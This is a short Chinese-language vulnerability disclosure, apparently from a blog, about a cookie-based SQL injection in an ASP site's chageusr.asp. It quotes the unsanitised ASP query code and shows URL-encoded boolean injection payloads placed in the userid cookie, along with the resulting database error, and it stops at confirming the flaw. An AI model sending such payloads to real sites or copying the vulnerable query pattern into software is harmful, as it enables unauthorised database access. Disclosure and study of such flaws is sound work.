文章作者：非零解
作者blog：http://www.nonzero.cn

欢迎转载，转载，请注明版权。在公布漏洞之前已经通知了官方。
漏洞：cookies注入
漏洞文件：chageusr.asp等
前提：注册会员
漏洞描述：

set rs=server.createobject("adodb.recordset")
sql="select * from users where userid='"&request.cookies("userid")&"' and password='"&request.cookies("password")&"'"
rs.open sql,conn,1,3

在对cookies的值userid和password未过滤直接执行sql语句，导致sql注入

漏洞利用：

用明小子等cookies修改工具，登陆用户后得到cookies如下：

userid=nonzero; okerer=yesok; myter=yes; login=4B7TM9; password=7a57a5a743894a0e; tc_total_cookie_datetime_14734=2007-4-10%2014%3A6%3A30; ASPSESSIONIDAQBCSDDT=DLGNGEIDLPKOKLMFCFOKCDHI


以userid=nonzero注入，提交userid=nonzero' and '1'='1后sql语句变为：select * from users where userid='nonzero' and '1'='1'把单引号合闭。首先还要把改为16进制为：%27% 20%61%6E%64%20%27%31%27%3D%27%31，然后提交cookies，如下：


userid=nonzero%27%20%61%6E%64%20%27%31%27%3D%27%31; okerer=yesok; myter=yes; login=4B7TM9; password=7a57a5a743894a0e; tc_total_cookie_datetime_14734=2007-4-10% 2014%3A6%3A30; ASPSESSIONIDAQBCSDDT=DLGNGEIDLPKOKLMFCFOKCDHI

页面返回正常，然后再把' and '1'='2编码，提交

userid=nonzero%27%20%61%6E%64%20%27%31%27%3D%27%32; okerer=yesok; myter=yes; login=4B7TM9; password=7a57a5a743894a0e; tc_total_cookie_datetime_14734=2007-4-10% 2014%3A6%3A30; ASPSESSIONIDAQBCSDDT=DLGNGEIDLPKOKLMFCFOKCDHI

返回数据为：
错误类型：
ADODB.Field (0x800A0BCD)
BOF 或 EOF 中有一个是“真”，或者当前的记录已被删除，所需的操作要求一个当前的记录。
/wlgf/www/vod/chageusr.asp, 第 103 行


说明存在注入，具体利用方法，就不说了。